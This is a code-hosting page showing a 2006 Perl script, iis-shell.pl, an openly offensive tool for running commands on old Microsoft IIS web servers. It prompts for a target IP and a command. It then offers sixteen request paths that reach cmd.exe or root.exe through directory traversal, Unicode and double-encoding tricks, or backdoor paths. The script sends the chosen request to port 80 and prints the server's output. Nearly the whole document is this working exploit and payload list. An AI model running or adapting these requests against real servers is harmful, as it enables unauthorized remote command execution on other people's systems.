src/perl/iis-shell.pl at 642caa0ec4151a7436d96b2f1d3432f1600b1d0d

Fork: 0
x-way / src
Find file
Newer
Older
src / perl / iis-shell.pl
Andreas Jaggi on 22 May 2006 3 KB
Raw Blame History
#!/usr/bin/perl -w
use IO::Socket::INET;

print "Enter IP: ";
$ip=<STDIN>;

print "Enter command: ";

while($cmd=<STDIN>)
{
	print 'Choose method:',"\n";
	print '[1] /scripts/root.exe?/c+',"\n";
	print '[2] /MSADC/root.exe?/c+',"\n";
	print '[3] /c/winnt/system32/cmd.exe?/c+',"\n";
	print '[4] /d/winnt/system32/cmd.exe?/c+',"\n";
	print '[5] /scripts/..%255c../winnt/system32/cmd.exe?/c+',"\n";
	print '[6] /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+',"\n";
	print '[7] /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+',"\n";
	print '[8] /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+',"\n";
	print '[9] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+',"\n";
	print '[10] /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+',"\n";
	print '[11] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+',"\n";
	print '[12] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+',"\n";
	print '[13] /scripts/..%%35%63../winnt/system32/cmd.exe?/c+',"\n";
	print '[14] /scripts/..%%35c../winnt/system32/cmd.exe?/c+',"\n";
	print '[15] /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+',"\n";
	print '[16] /scripts/..%252f../winnt/system32/cmd.exe?/c+',"\n";
	
	$method=<STDIN>;
		if($method == 1){
			$cmd = 'GET /scripts/root.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 2){
			$cmd = 'GET /MSADC/root.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 3){
			$cmd = 'GET /c/winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 4){
			$cmd = 'GET /d/winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 5){
			$cmd = 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 6){
			$cmd = 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 7){
			$cmd = 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 8){
			$cmd = 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 9){
			$cmd = 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 10){
			$cmd = 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 11){
			$cmd = 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 12){
			$cmd = 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 13){
			$cmd = 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 14){
			$cmd = 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 15){
			$cmd = 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
		if($method == 16){
			$cmd = 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+'.$cmd.' HTTP/1.0';
			}
	print $cmd."\n";
	
	$socket=new IO::Socket::INET->new(PeerPort=>80,Proto=>'tcp',PeerAddr=>$ip) or die('Connection failed');
	$socket->send($cmd);
	$socket->recv($text,1048576);
	while($text ne '')
	{
		print $text;
		$socket->recv($text,1048576);
	}
	$socket->shutdown(0);
	print "\n\nEnter command: ";
}